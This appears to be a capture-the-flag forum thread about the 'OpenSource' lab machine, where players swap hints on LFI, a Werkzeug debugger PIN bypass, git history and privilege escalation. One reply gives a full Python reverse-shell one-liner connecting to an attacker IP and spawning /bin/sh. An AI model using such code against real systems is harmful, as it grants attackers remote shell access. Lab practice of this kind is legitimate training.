Official OpenSource Discussion

Nice Box! Just learned few things!

Thank you guys for the hints on the comments, it really helped. So I will let my comments.
Since this is my frist time doing this, please I’m sorry if it’s a spoiler, not sure how it work but I would appreciate if you exclude it in that case.

Foothold: Basic enumeration will give you some code, read it, most people only think on the L** vuln , but there is file with HTML code (Only basic HTML? Not sure :wink: ) that can give you an idea on what else you can do… So, you can read, you can write, just think a little bit.

User: I struggled on this, you probably on the right folder and tool, but, developers do not work alone and they like to separate stuff as well, Google IT. After that, if you did a good scan you found something you could not use in the past, what now? (This comment helped me a lot)

Root: @glasn0st Excellent hint!

2 Likes

Can I get a hint? I’m stuck at the L** and have been messing with the C****** trying to get a reverse shell and also trying to find “Public” files trough It. I looked though the .*** folder and found the L*** folder and think they are creds but don’t know how to “use” them.

Hey, I am stuck at the L**, too. Know where it is, but unable to execute.
A hint would be very nice!

2 Likes

Has anyone been able to exploit via the werkzeug debugger yet? Just wanted to check if you are able to execute commands on the interactive console? Tried the debugger way but was unable to execute any commands on the interactive console

Yes. I got the access to the machine through executing rev shell in the debugger console.
Use this GitHub - wdahlenburg/werkzeug-debug-console-bypass: Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. to get the access to the console.

Is checking git also a dead end, because even though the developer adds the .gitignore file in future commit but cant really find any exploitable differences in git log.

Git deeper !
What is Git for ? How do developers use it ?

1 Like

Please someone help me.
I can exec some command in Dxxxxr cxxxxxxxr’s shell via console, but I cant establish outbound connection like ‘console> nc my-ip my-listen-port’.
How did you exec reverse shell?

use python rev. shell: import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.6”,4444));subprocess.call([“/bin/sh”,“-i”],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())

1 Like

If anybody has any tips for me that would be highly appreciated. As far as i can tell you need to use the upload functionality then trigger the reverse shell from it somehow, but to do that i need to modify the v***.py file i think and i seriously don’t understand how i can do that. Also i was able to find something strange in *****.json file when checking the git history don’t know if its important or not.

guys i stuck on console page
i don’t understand the hints too, i don’ know what should i do with .py files. i used run.py
for console’s pin, but couldn’t go further
could someone DM me? i need a straight hint
edited:

Summary

ok now i checked “show hidden file”, and i discovered a folder named .git, don’t know what to do yet

Got a shell in the docker container but stuck there,
could someone please dm me with a hint or tell me if im in the right direction…

How can i unlock /console? I am stucking here. The pin that i generated it is invalid. What user name should i use in pin generation phase.HELP PLEASE?

hey all

I know I should be looking for L** but am having trouble making it work

If anyone could push me in the right direction on either of these issues I’d appreciate it

Can someone help me with the root phase, i am pretty sure i am pretty close but i cant get it to work.
Thanks you :smiley:

you dont need the /console, to get the foothold, try to look at the sourceCode again.

stuck at getting root… Search for every process run by root but not working. I think it might be p_lk_t vuln but not succeed.

Have you tried root?

Hi everyone, I have tried almost all ways in getting the foothold but to no avail.

Understand not to place much attention on the /console pin as there are other ways such as reviewing/modifying the downloaded source code (views.py, utils.py), html code and .git folder. However, I still did not have any luck obtaining the user flag.

I managed to get a shell in the docker but that is as far as I can go. Have also tried to break out of the docker container but failed.

Would really appreciate if anyone can reply/private message me some hints on where I can look for next. Thanks.

got the shell after L** now sucked with post reverse shell part